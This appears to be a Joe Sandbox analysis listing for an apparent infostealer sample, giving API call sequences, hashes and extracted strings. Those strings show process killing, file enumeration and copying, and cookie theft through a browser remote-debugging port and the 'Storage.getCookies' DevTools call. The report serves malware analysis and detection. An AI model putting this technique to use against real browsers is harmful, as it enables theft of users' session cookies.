                              • Part of subcall function 006F46A0: Process32First.KERNEL32(00000000,00000128), ref: 006F46C9
                              • Part of subcall function 006F46A0: Process32Next.KERNEL32(00000000,00000128), ref: 006F46DB
                              • Part of subcall function 006F46A0: StrCmpCA.SHLWAPI(?,?), ref: 006F46ED
                              • Part of subcall function 006F46A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 006F4702
                              • Part of subcall function 006F46A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 006F4711
                              • Part of subcall function 006F46A0: CloseHandle.KERNEL32(00000000), ref: 006F4718
                              • Part of subcall function 006F46A0: Process32Next.KERNEL32(00000000,00000128), ref: 006F4726
                              • Part of subcall function 006F46A0: CloseHandle.KERNEL32(00000000), ref: 006F4731
                            • lstrcat.KERNEL32(00000000,?), ref: 006D9878
                            • lstrcat.KERNEL32(00000000,?), ref: 006D9889
                            • lstrcat.KERNEL32(00000000,00704B60), ref: 006D989B
                            • memset.MSVCRT ref: 006D98AF
                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 006D98D4
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D9903
                            • StrStrA.SHLWAPI(00000000,0101F160), ref: 006D9919
                            • lstrcpyn.KERNEL32(009093D0,00000000,00000000), ref: 006D9938
                            • lstrlen.KERNEL32(?), ref: 006D994B
                            • wsprintfA.USER32 ref: 006D995B
                            • lstrcpy.KERNEL32(?,00000000), ref: 006D9971
                            • Sleep.KERNEL32(00001388), ref: 006D99E7
                              • Part of subcall function 006D1530: lstrcpy.KERNEL32(00000000,?), ref: 006D1557
                              • Part of subcall function 006D1530: lstrcpy.KERNEL32(00000000,?), ref: 006D1579
                              • Part of subcall function 006D1530: lstrcpy.KERNEL32(00000000,?), ref: 006D159B
                              • Part of subcall function 006D1530: lstrcpy.KERNEL32(00000000,?), ref: 006D15FF
                              • Part of subcall function 006D92B0: strlen.MSVCRT ref: 006D92E1
                              • Part of subcall function 006D92B0: strlen.MSVCRT ref: 006D92FA
                              • Part of subcall function 006D92B0: strlen.MSVCRT ref: 006D9399
                              • Part of subcall function 006D92B0: strlen.MSVCRT ref: 006D93E6
                              • Part of subcall function 006F4740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 006F4759
                              • Part of subcall function 006F4740: Process32First.KERNEL32(00000000,00000128), ref: 006F4769
                              • Part of subcall function 006F4740: Process32Next.KERNEL32(00000000,00000128), ref: 006F477B
                              • Part of subcall function 006F4740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 006F479C
                              • Part of subcall function 006F4740: TerminateProcess.KERNEL32(00000000,00000000), ref: 006F47AB
                              • Part of subcall function 006F4740: CloseHandle.KERNEL32(00000000), ref: 006F47B2
                              • Part of subcall function 006F4740: Process32Next.KERNEL32(00000000,00000128), ref: 006F47C0
                              • Part of subcall function 006F4740: CloseHandle.KERNEL32(00000000), ref: 006F47CB
                            • CloseDesktop.USER32(?), ref: 006D9A1C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Process32lstrcat$Close$HandleNextProcessstrlen$CreateDesktopOpenmemset$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                            • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                            • API String ID: 958055206-1862457068
                            • Opcode ID: ccf62fae2f96a05f991857d14d1b611c5cd1a665bef155db25803ed1f4d9ccee
                            • Instruction ID: 641ceb7dab9619ebc6eb819f1b9eb5e37a4a11d6eafc992054873d63e3ccf34d
                            • Opcode Fuzzy Hash: ccf62fae2f96a05f991857d14d1b611c5cd1a665bef155db25803ed1f4d9ccee
                            • Instruction Fuzzy Hash: 8991A4B1A10218AFDB60DF74DC45FEE77B9EF44700F144199F609A7291DF70AA448BA4
                            APIs
                            • wsprintfA.USER32 ref: 006EE22C
                            • FindFirstFileA.KERNEL32(?,?), ref: 006EE243
                            • StrCmpCA.SHLWAPI(?,007017A0), ref: 006EE263
                            • StrCmpCA.SHLWAPI(?,007017A4), ref: 006EE27D
                            • wsprintfA.USER32 ref: 006EE2A2
                            • StrCmpCA.SHLWAPI(?,006FCFEC), ref: 006EE2B4
                            • wsprintfA.USER32 ref: 006EE2D1
                              • Part of subcall function 006EEDE0: lstrcpy.KERNEL32(00000000,?), ref: 006EEE12
                            • wsprintfA.USER32 ref: 006EE2F0
                            • PathMatchSpecA.SHLWAPI(?,?), ref: 006EE304
                            • lstrcat.KERNEL32(?,0101FC40), ref: 006EE335
                            • lstrcat.KERNEL32(?,00701794), ref: 006EE347
                            • lstrcat.KERNEL32(?,?), ref: 006EE358
                            • lstrcat.KERNEL32(?,00701794), ref: 006EE36A
                            • lstrcat.KERNEL32(?,?), ref: 006EE37E
                            • CopyFileA.KERNEL32(?,?,00000001), ref: 006EE394
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EE3D2
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EE422
                            • DeleteFileA.KERNEL32(?), ref: 006EE45C
                              • Part of subcall function 006D1530: lstrcpy.KERNEL32(00000000,?), ref: 006D1557
                              • Part of subcall function 006D1530: lstrcpy.KERNEL32(00000000,?), ref: 006D1579
                              • Part of subcall function 006D1530: lstrcpy.KERNEL32(00000000,?), ref: 006D159B
                              • Part of subcall function 006D1530: lstrcpy.KERNEL32(00000000,?), ref: 006D15FF
                            • FindNextFileA.KERNEL32(00000000,?), ref: 006EE49B
                            • FindClose.KERNEL32(00000000), ref: 006EE4AA
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                            • String ID: %s\%s$%s\*
                            • API String ID: 1375681507-2848263008
                            • Opcode ID: 26e3639c51a91b2af2c1a00046e02ae32f243ffd4b82d685e2cc9aa99fff4b94
                            • Instruction ID: f38697309fd1f032fd302f1b2469a8886ef0ab6ac554aa89f8abad0997d5a756
                            • Opcode Fuzzy Hash: 26e3639c51a91b2af2c1a00046e02ae32f243ffd4b82d685e2cc9aa99fff4b94
                            • Instruction Fuzzy Hash: 358191B1914219DFCB20EF75DC49AEF77BABF54300F044599B64A93281EB35AA44CFA0
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006D16E2
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006D1719
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D176C
                            • lstrcat.KERNEL32(00000000), ref: 006D1776
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006D17A2
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D18F3
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006D18FE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat
                            • String ID: \*.*
                            • API String ID: 2276651480-1173974218
                            • Opcode ID: 56142eeeabdf7ceb651c9b68314137d42d3e08cbb425599e7966ed8a4f6cac6b
                            • Instruction ID: 201e77eff770a35762372a472ae501a212e47220aa96ff4220d5061275d5e6e0
                            • Opcode Fuzzy Hash: 56142eeeabdf7ceb651c9b68314137d42d3e08cbb425599e7966ed8a4f6cac6b
                            • Instruction Fuzzy Hash: 02818270D1521AAFCB61EF65D9A5AEE77B6EF11300F08112AF805AF362CB709D01CB91
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 006EDD45
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006EDD4C
                            • wsprintfA.USER32 ref: 006EDD62
                            • FindFirstFileA.KERNEL32(?,?), ref: 006EDD79
                            • StrCmpCA.SHLWAPI(?,007017A0), ref: 006EDD9C
                            • StrCmpCA.SHLWAPI(?,007017A4), ref: 006EDDB6
                            • wsprintfA.USER32 ref: 006EDDD4
                            • DeleteFileA.KERNEL32(?), ref: 006EDE20
                            • CopyFileA.KERNEL32(?,?,00000001), ref: 006EDDED
                              • Part of subcall function 006D1530: lstrcpy.KERNEL32(00000000,?), ref: 006D1557
                              • Part of subcall function 006D1530: lstrcpy.KERNEL32(00000000,?), ref: 006D1579
                              • Part of subcall function 006D1530: lstrcpy.KERNEL32(00000000,?), ref: 006D159B
                              • Part of subcall function 006D1530: lstrcpy.KERNEL32(00000000,?), ref: 006D15FF
                              • Part of subcall function 006ED980: memset.MSVCRT ref: 006ED9A1
                              • Part of subcall function 006ED980: memset.MSVCRT ref: 006ED9B3
                              • Part of subcall function 006ED980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 006ED9DB
                              • Part of subcall function 006ED980: lstrcpy.KERNEL32(00000000,?), ref: 006EDA0E
                              • Part of subcall function 006ED980: lstrcat.KERNEL32(?,00000000), ref: 006EDA1C
                              • Part of subcall function 006ED980: lstrcat.KERNEL32(?,0101F190), ref: 006EDA36
                              • Part of subcall function 006ED980: lstrcat.KERNEL32(?,?), ref: 006EDA4A
                              • Part of subcall function 006ED980: lstrcat.KERNEL32(?,0101DC48), ref: 006EDA5E
                              • Part of subcall function 006ED980: lstrcpy.KERNEL32(00000000,?), ref: 006EDA8E
                              • Part of subcall function 006ED980: GetFileAttributesA.KERNEL32(00000000), ref: 006EDA95
                            • FindNextFileA.KERNEL32(00000000,?), ref: 006EDE2E
                            • FindClose.KERNEL32(00000000), ref: 006EDE3D
                            • lstrcat.KERNEL32(?,0101FC40), ref: 006EDE66
                            • lstrcat.KERNEL32(?,0101E838), ref: 006EDE7A
                            • lstrlen.KERNEL32(?), ref: 006EDE84
                            • lstrlen.KERNEL32(?), ref: 006EDE92
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EDED2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                            • String ID: %s\%s$%s\*
                            • API String ID: 4184593125-2848263008
                            • Opcode ID: e11bed744071b09273504407ccdc4f11717ac350ffbfe04871e989a137e5eb27
                            • Instruction ID: e090a9a7858dc0671e394528fb76b8bae55b9b281429846b0b0cea66bdbb0231
                            • Opcode Fuzzy Hash: e11bed744071b09273504407ccdc4f11717ac350ffbfe04871e989a137e5eb27
                            • Instruction Fuzzy Hash: C66193B1A10219AFCB20EF74DC49AEE77BAFF58300F0445A9B645D7391DB34AA44CB90
                            APIs
                            • wsprintfA.USER32 ref: 006ED54D
                            • FindFirstFileA.KERNEL32(?,?), ref: 006ED564
                            • StrCmpCA.SHLWAPI(?,007017A0), ref: 006ED584
                            • StrCmpCA.SHLWAPI(?,007017A4), ref: 006ED59E
                            • lstrcat.KERNEL32(?,0101FC40), ref: 006ED5E3
                            • lstrcat.KERNEL32(?,0101FAF0), ref: 006ED5F7
                            • lstrcat.KERNEL32(?,?), ref: 006ED60B
                            • lstrcat.KERNEL32(?,?), ref: 006ED61C
                            • lstrcat.KERNEL32(?,00701794), ref: 006ED62E
                            • lstrcat.KERNEL32(?,?), ref: 006ED642
                            • lstrcpy.KERNEL32(00000000,?), ref: 006ED682
                            • lstrcpy.KERNEL32(00000000,?), ref: 006ED6D2
                            • FindNextFileA.KERNEL32(00000000,?), ref: 006ED737
                            • FindClose.KERNEL32(00000000), ref: 006ED746
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                            • String ID: %s\%s
                            • API String ID: 50252434-4073750446
                            • Opcode ID: 963d19950e5c25a8be2625abd4fa7b07806a6b6b2cf77b3697a37a2ab3082456
                            • Instruction ID: e804697fa7c7026a4a06831a6b25a17f4e8e743cc9e5a97810fdae483e51f8c7
                            • Opcode Fuzzy Hash: 963d19950e5c25a8be2625abd4fa7b07806a6b6b2cf77b3697a37a2ab3082456
                            • Instruction Fuzzy Hash: 3C615FB1D102199FCB60EF75DC88ADE77B9EF58300F0485A9E64997351EB34AA44CF90
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_
                            • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                            • API String ID: 909987262-758292691
                            • Opcode ID: abcdc527273ebc1a67e33ee4d43e2a1a80ea4cf14259b24d2d96d3a9e9b514a3
                            • Instruction ID: db3a9efd7ac39eb5e5341a6b9a57c4272c76c57c5ff5ce676efe700784edd906
                            • Opcode Fuzzy Hash: abcdc527273ebc1a67e33ee4d43e2a1a80ea4cf14259b24d2d96d3a9e9b514a3
                            • Instruction Fuzzy Hash: AEA24871E0126D9FDB50DFA8C8807EEBBB6AF48300F1481AAD619A7341DB715E85CF94
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E23D4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E23F7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E2402
                            • lstrlen.KERNEL32(\*.*), ref: 006E240D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E242A
                            • lstrcat.KERNEL32(00000000,\*.*), ref: 006E2436
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E246A
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 006E2486
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                            • String ID: \*.*
                            • API String ID: 2567437900-1173974218
                            • Opcode ID: db3702c543c1e69be693d60ef81773193a973e9b1014a7a2995f06f3541e237e
                            • Instruction ID: bd294700103d1b1e55cb193385bfd294010a507931bf1845ef250046e0b409bf
                            • Opcode Fuzzy Hash: db3702c543c1e69be693d60ef81773193a973e9b1014a7a2995f06f3541e237e
                            • Instruction Fuzzy Hash: E8414471A2525B8BC772EF26DDA5B9E77EBEF24300F046129B84997352CB709C018B94
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 006F46B9
                            • Process32First.KERNEL32(00000000,00000128), ref: 006F46C9
                            • Process32Next.KERNEL32(00000000,00000128), ref: 006F46DB
                            • StrCmpCA.SHLWAPI(?,?), ref: 006F46ED
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 006F4702
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 006F4711
                            • CloseHandle.KERNEL32(00000000), ref: 006F4718
                            • Process32Next.KERNEL32(00000000,00000128), ref: 006F4726
                            • CloseHandle.KERNEL32(00000000), ref: 006F4731
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                            • String ID:
                            • API String ID: 3836391474-0
                            • Opcode ID: b4968e04f5829a7345173836f412259f3cef48462ee29f54cb6038f83503c193
                            • Instruction ID: a4c595acbc9785bd880844b50c8df5eec222f4e7de4dc0bb35c7f60bea2e0726
                            • Opcode Fuzzy Hash: b4968e04f5829a7345173836f412259f3cef48462ee29f54cb6038f83503c193
                            • Instruction Fuzzy Hash: B001C031625129AFE7206B60DC8DFFB377CEB49B41F000098FA45E1181EF749980ABA0
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 006F4628
                            • Process32First.KERNEL32(00000000,00000128), ref: 006F4638
                            • Process32Next.KERNEL32(00000000,00000128), ref: 006F464A
                            • StrCmpCA.SHLWAPI(?,steam.exe), ref: 006F4660
                            • Process32Next.KERNEL32(00000000,00000128), ref: 006F4672
                            • CloseHandle.KERNEL32(00000000), ref: 006F467D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                            • String ID: steam.exe
                            • API String ID: 2284531361-2826358650
                            • Opcode ID: 118ed80a639fcf9285e36fc5cfcf9c7ac865088c1de3614dc4d3ed91c80897c0
                            • Instruction ID: 24858fc323ba532906a078067bdb24023a6062c1daf18dc4e0c221cfca14bab6
                            • Opcode Fuzzy Hash: 118ed80a639fcf9285e36fc5cfcf9c7ac865088c1de3614dc4d3ed91c80897c0
                            • Instruction Fuzzy Hash: 7701AD7161A1289FE720AB70AC48FEB77BCEF0A750F0001D5FA48D1181EF748A949BE1
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006E4B51
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E4B74
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006E4B7F
                            • lstrlen.KERNEL32(00704CA8), ref: 006E4B8A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006E4BA7
                            • lstrcat.KERNEL32(00000000,00704CA8), ref: 006E4BB3
